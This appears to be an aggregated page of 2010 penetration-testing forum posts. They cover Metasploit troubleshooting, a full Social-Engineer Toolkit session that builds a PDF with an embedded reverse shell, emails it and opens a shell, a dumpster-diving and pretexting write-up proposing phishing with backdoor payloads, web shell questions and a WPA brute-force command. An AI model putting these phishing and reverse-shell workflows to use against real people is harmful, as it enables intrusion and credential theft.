remote-exploit: Metasploit Oracle Login_brute problems - Windows

metasploit_newbie — Mon, 29 Mar 2010 06:33:25 -0600

Hello,

I am trying to use 'auxiliary/admin/oracle/login_brute' in metasploit 3.3 but I am getting the following error.

------
[-] Auxiliary failed: NameError uninitialized constant OCIError [-] Call stack:
[-]
/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:434:in
`load_missing_constant'
[-]
/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:80:in
`const_missing_with_dependencies'
[-]
/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:92:in
`const_missing'
[-] (eval):55:in `rescue in block in run'
[-] (eval):52:in `block in run'
[-] /usr/lib/ruby/1.9.1/csv.rb:1761:in `each'
[-] /usr/lib/ruby/1.9.1/csv.rb:1197:in `block in foreach'
[-] /usr/lib/ruby/1.9.1/csv.rb:1335:in `open'
[-] /usr/lib/ruby/1.9.1/csv.rb:1196:in `foreach'
[-] (eval):47:in `run'[*] Auxiliary module execution completed

-----

I have tried the below recommendation for Windows Server 2003 environment but it is giving the same problem. Please assist. Thanks.

[1]Install subversion client
CollabNetSubversion-client-1.6.9-1.win32.exe
[2]install ruby
ruby186-27_rc2.exe
[3]install ruby-oci8
wget ruby-oci8-1.0.7-mswin32.rb
ruby ruby-oci8-1.0.7-mswin32.rb
[4]
svn co metasploit.com/svn/framework3/trunk/ metasploit

cd metasploit
ruby msfconsole (I am not able to execute this command successfully)

remote-exploit: Metasploit tcp connect ...

Trips — Sun, 28 Mar 2010 19:06:45 -0600

For the last few weeks i've been playing with metasploit ...

Ive had fun hacking an old server using the old net_api overflow on xp sp 2

I just read the metasploit blog about the new adobe_libtiff exploit

i used the payload

windows/meterpreter/reverse_tcp

(is this right ?)

I have the PDF on the target machine it works A ok and connects back to my machine on xxx.xxx.xxx.3:1133 my question is ....

how do i go from a tcp connection to either a meterpreter session or vncinject using the command line in ruby ?

i've tried:

connect xxx.xxx.xxx.4:1133 ... it connects but then does nothing ?

^^^ do i need to run this as a bg session/job ?

any suggestions please

& please dont flame me

remote-exploit: social engeneering toolkit mass email attack question

yoma819 — Sat, 20 Mar 2010 16:27:41 -0600

hello all
i am trying to get remote access to my main computer on my network using the set email attack.
however when i open the pdf i do not get command line access!
see below:
thanks in advance for the advice
yoma

Code:



                .M"""bgd `7MM"""YMM MMP""MM""YMM

                ,MI    "Y  MM    `7 P'  MM  `7

                `MMb.      MM  d        MM

                  `YMMNq.  MMmmMM        MM

                .    `MM  MM  Y  ,    MM

                Mb    dM  MM    ,M    MM

                P"Ybmmd"  .JMMmmmmMMM  .JMML.



  [---]      The Social-Engineer Toolkit (SET)          [---]

  [---]        Written by David Kennedy (ReL1K)        [---]

  [---]                Version: 0.4.1                  [---]

  [---]      Codename: 'Rise of the Pink Pirate'        [---]

  [---]    Report bugs to: davek@social-engineer.org    [---]

  [---]      Check out: [social-engineer.org ]     [---]

  [---]        Homepage: [www.secmaniac.com ]       [---]

  [---] Tutorial: [offsec.com] [---]

  [---]      Unpublished Java Applet by: Thomas Werth    [---]



Welcome to the Social-Engineer Toolkit (SET). Your one

stop shop for all of your social-engineering needs..



Select from the menu on what you would like to do:



1. Spear-Phishing (Email) Attacks

2. Website Attack Vectors

3. Update the Metasploit Framework

4. Update the Social-Engineer Toolkit

5. Create a Payload and Listener

6. Help, Credits, and About

7. Exit the Social-Engineer Toolkit



Enter your choice: 1



Welcome to the SET E-Mail attack method. This module allows you

to specially craft email messages and send them to a large (or small)

number of people with attached fileformat malicious payloads. If you

want to spoof your email address, be sure "Sendmail" is installed (it

is installed in BT4) and change the config/set_config SENDMAIL=OFF flag

to SENDMAIL=ON.



There are two options, one is getting your feet wet and letting SET do

everything for you (option 1), the second is to create your own FileFormat

payload and use it in your own attack. Either way, good luck and enjoy!



1. Perform a Mass Email Attack

2. Create a FileFormat Payload

3. Create a Social-Engineering Template

4. Return to Main Menu.



Enter your choice: 1



Select the file format exploit you want.

The default is the PDF embedded EXE.



        ********** PAYLOADS **********



1. Adobe Collab.collectEmailInfo Buffer Overflow

2. Adobe Collab.getIcon Buffer Overflow

3. Adobe JBIG2Decode Memory Corruption Exploit

4. Adobe PDF Embedded EXE Social Engineering

5. Adobe util.printf() Buffer Overflow

6. Custom EXE to VBA (sent via RAR) (RAR required)

7. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun



Enter the number you want (press enter for default): 4

You have selected the default payload creation. SET will generate a normal PDF with embedded EXE.



1. Windows Reverse TCP Shell

2. Windows Meterpreter Reverse_TCP

3. Windows Reverse VNC

4. Windows Reverse TCP Shell (x64)

5. Windows Meterpreter Reverse_TCP (X64)

6. Windows Shell Bind_TCP (X64)



Enter the payload you want (press enter for default): 1

Enter the port to connect back on (press enter for default):[*] Defaulting to port 443...[*] Generating fileformat exploit...[*] Please wait while we load the module tree...[*] Started reverse handler on 192.168.1.3:443[*] Reading in 'src/msf_attacks/form.pdf'...[*] Parsing 'src/msf_attacks/form.pdf'...[*] Parsing Successful.[*] Using 'windows/shell_reverse_tcp' as payload...[*] Creating 'template.pdf' file...[*] Generated output file /pentest/exploits/SET/src/program_junk/template.pdf

[*] Payload creation complete.[*] All payloads get sent to the src/msf_attacks/template.pdf directory[*] Payload generation complete. Press enter to continue.





As an added bonus, use the file-format creator in SET to create your attachment.



Right now the attachment will be imported with filename of 'template.whatever'



Do you want to rename the file?



example Enter the new filename: moo.pdf



1. Keep the filename, I don't care.

2. Rename the file, I want to be cool.



Enter your choice (enter for default): 1

Keeping the filename and moving on.



Social Engineer Toolkit Mass E-Mailer



There are two options on the mass e-mailer, the first would

be to send an email to one indivdual person. The second option

will allow you to import a list and send it to as many people as

you want within that list.



What do you want to do:



1. E-Mail Attack Single Email Address

2. E-Mail Attack Mass Mailer

3. Return to main menu.



Enter your choice: 1



Do you want to use a predefined template or craft

a one time email template.



1. Pre-Defined Template

2. One-Time Use Email Template



Enter your choice: 1

Below is a list of available templates:



1: LOL...have to check this out...

2: Dan Brown's Angels & Demons

3: Baby Pics

4: New Update

5: Computer Issue

6: Status Report

7: Strange internet usage from your computer



Enter the number you want to use: 1



Enter who you want to send email to:(my email)



What option do you want to use?



1. Use a GMAIL Account for your email attack.

2. Use your own server or open relay



Enter your choice: 1

Enter your GMAIL email address: (same email again)

Enter your password for gmail (it will not be displayed back to you):





SET has finished deliverying the emails.



Do you want to setup a listener yes or no: yes



                                  _      _

            _                  | |    (_)_

 ____  ____| |_  ____  ___ ____ | | ___  _| |_

|    / _  )  _)/ _  |/___)  _ | |/ _ | |  _)

| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__

|_|_|_|____)___)_||_(___/| ||_/|_|___/|_|___)

                          |_|





      =[ metasploit v3.3.4-dev [core:3.3 api:1.0]

+ -- --=[ 535 exploits - 254 auxiliary

+ -- --=[ 198 payloads - 23 encoders - 8 nops

      =[ svn r8859 updated today (2010.03.20)



resource (src/program_junk/meta_config)> use exploit/multi/handler

resource (src/program_junk/meta_config)> set PAYLOAD windows/shell_reverse_tcp

PAYLOAD => windows/shell_reverse_tcp

resource (src/program_junk/meta_config)> set LHOST 192.168.1.3

LHOST => 192.168.1.3

resource (src/program_junk/meta_config)> set LPORT 443

LPORT => 443

resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai

ENCODING => shikata_ga_nai

resource (src/program_junk/meta_config)> set ExitOnSession false

ExitOnSession => false

resource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.3:443[*] Starting the payload handler...

msf exploit(handler) >[*] Command shell session 1 opened (192.168.1.3:443 -> 192.168.1.4:3768)



msf exploit(handler) >

remote-exploit: Reality Hacking

utram — Sat, 20 Mar 2010 14:05:39 -0600

Note: I haven't made 15 posts yet so the pictures can be found in the distorted URLs.

There is no such thing as irrelevant information ~ Muts

During the final stage of the information gathering stage (if possible) I visit the target for some reconnaissance work in a process that involves exploration and inference. In this case I examined a telecommunications centre which houses a base transceiver station(cell site) and a virtual switchboard. All of this was done with permission. This is a simple overview of my methodology and the purpose of it is to demonstrate how trifles can turn out to be useful pieces of information.

Gear

1) Gloves: I don't need to explain this one?
2) Knife: For cutting bags
3) Torch: A portable light with a magnifying glass(good for poorly written scribbles)
4) Folder, backpack or plastic bag(I prefer the latter)
5) Digital camera: Indispensable.

h ttp://i41.tinypic.com/16lidko.jpg

Appearance

I usually put on clothes which give me the air of a vagrant but I don't exaggerate it. I'll wear a cheap rain jacket, torn jeans, a hood and I'll remove my glasses and mess up my goatee beard. This will avail against prying eyes since I'll just look like a bum rummaging the garbage for recyclable materials and/or food. Why is this important? because I don't want to produce the impression of an document/identity thief.

Garbage

Even in the days of the paper shredder it's very likely you'll find whole documents, letters and all sorts of memorandums. From this we can collect names of employees and customers, phone numbers, email addresses, material on office routines, schedules and so on and so forth. I addition to useful info I can also deduce recent activities. Let's take a look.

h ttp://i41.tinypic.com/k51nao.jpg

Note the abundance of twisted pair cabling that is on top; could this be just old wires? or perhaps a change in equipment?

Lying below the bag of wiring on the left side I found a box--- on it is an address of a seller and manufacturer of computer equipment and in addition on the post label there is a content description stating "modular connectors". From this I can deduce that they have indeed been improving their network and this could be fodder for a social engineering attack.

h ttp://i44.tinypic.com/2rdztjc.jpg

And finally paper, white gold. I always stress my search for crumpled and/or torn notes.
From all this this I found the following:
9 Employee names
More assorted names and phone numbers to count. Customers perhaps?
3 work schedules
A paper with the IPs of local hosts scribbled on them, as well as other connection config info.
A document with electronic consumption measurements.
An employment application.
A crumpled post-it-note with a username and password from a web-app of their site.
An internal "staff only" URL

h ttp://i43.tinypic.com/14nzjte.jpg

The Building

I have an eye open for aberrations, I view this as fodder for social engineering attacks. I also peek inside for anything that could be of use.

h ttp://i39.tinypic.com/s4wi9f.jpg

Trouble with your antenna? Here I'm allowed to draw the conclusion that their TV reception is poor. This could be useful fodder for an SE attack; I could ascertain who's behind their TV service and impersonate a service rep stating that he detects that their television converter box or set-top box is receiving a sub-par signal and thus send them an email containing guidelines on improving their signal. This email could be a vehicle for a backdoor payload or contain links to sham sites on improving the signal or maybe even a manual of whatever set-top unit they are using. Remember, being elaborate is a key element.

h ttp://i43.tinypic.com/8zpahg.jpg

May not be clear on photo but they are all running Win XP Pro. Earlier that evening I saw that the monitor at the anterior was displaying the latest version of Internet Explorer and MSN messenger.

h ttp://i44.tinypic.com/140ygi1.jpg

Now I know who is providing security.

h ttp://i42.tinypic.com/35d2rmb.jpg

Hmm... vandalism? maybe they are not doing such a good job. Here I can make a telephone call or send a sham email from a competing security guard services provider or maybe even send an email from Securitas themselves and use the vandalism examples as a basis for a proposition for increased patrolling and in the process implement an attack similar to the one with the antenna problem.

h ttp://i42.tinypic.com/9idyk4.jpg

The lights are turned on at 3:00 in the morning?
Nice, a whiteboard. Here I learnt important topics which are evidently under discussion at this business. In this case they were looking for buyers for a telephone directory service. This is something which I could avail myself of, such as shammed interest in this product as a pretext to gain more info or maybe even access(which I eventually did).

Conclusion

In just 30 minutes I acquired a good chunk of information without any key strokes, which aided me very well latter on in the attack. I am happy to announce that I successfully penetrated several computers at this company. I proposed to them the following solutions
1. Use paper shredders
2. Turn your damn lights off.
3. Be more circumspect with phonecalls and emails pertaining to problems visible from the outside.

If you live in the same or an adjacent city you could give this a try. It's quite a thrill.

remote-exploit: vnc connection logs

prelate — Fri, 19 Mar 2010 16:17:00 -0600

I have a client with an older Fedora box. They allow external connections via the built in remote desktop sharing (vino-server). I've been asked to audit the vnc connections to the box for the past 3 months.

I didn't set up the machine so I'm not sure what options have been set up for logging. Does anyone know if there are any default vnc logs or where I can start looking for connection logs to port 5900?

Thanks in advance.

remote-exploit: Metasploit latest Videos ___4x Security Team

mzer0 — Fri, 19 Mar 2010 01:53:15 -0600

hi,
MS10-002 ,ie_iepeers (Microsoft Internet Explorer iepeers.dll use-after-free exploit )

4xsecurityteam.blogspot(dot)com (home page)

4xunderground.blogspot(dot)com

vimeo(dot)com/user1010000

thk$

remote-exploit: ip question

shanch123 — Wed, 17 Mar 2010 16:33:30 -0600

Hey guys, i have seen lots of documents about how to hack and ive tried many exploits on my test server (hp proliant dl380g3 i got off ebay :D). But ive never tryed rooting it before :S i looked around google but only found outdated papers from the 90s lol. i have seen webshells like c99 and r57, with options like "connect back" and "bind shell". Ive looked into it and found that for "connect back" you have to portfoward if it a remote host connecting to you, but not if its a lan. "Bind shell" is me doing "nc ", which is usually blocked by firewalls?

so people say "connect back" shell are the best but dont they show your ip address? also ive heard of data pipe shells which has something to do with irc?

Could someone educate me some more please :D

remote-exploit: question using RARcrack

Rob5454 — Wed, 17 Mar 2010 09:29:06 -0600

what is --threads[num] mean when using the option. iv search for awhile and i cant find notihng!!! :o

remote-exploit: How to manually select version of target in ms08-067

okifd — Fri, 12 Mar 2010 13:40:25 -0700

[*] Automatically detecting the target...[*] Fingerprint: Windows 2003 Service Pack 1 - lang:Unknown[*] Could not determine the exact language pack[*] Exploit completed, but no session was created.

Exploit target:

Id Name
-- ----
0 Automatic Targeting

How can i manually select the version of it + language?

my 2nd question is how do i run the GUI of metasploit in windows?

Thanks.

remote-exploit: Secure enough ??

cassarrobert — Fri, 12 Mar 2010 04:51:21 -0700

Hi,

Last week I decided to check if my network was secure "enough". I got my WPA Handshake within seconds (which is quite acceptable). I then got down to trying to crack it.

I used all the dictionaries i could get my hands on to try and brute-force my way in but found nothing. So far so good. But I still wasn't convinced.

Through some social engineering, and after a few pints of lager, i tricked myself into telling me that the password was made of a 10 digit mixture of letters and numbers. I therefore tried a different way:

/pentest/password/crunch 10 10 "abcdefghijkl.......1234567890" | aircrack-ng ..... wpa-01.cap

After something like 4 days of scanning 385 keys/second it had barely just started the 3rd digit. This made me feel a lot safer.

Question: Are there "faster" ways other than crunch to get to a 10 digit password by checking every possible permutation, or may I assume that no one is going to have the time to crack my password (at least for the next few hundreds of years) ???

Thanks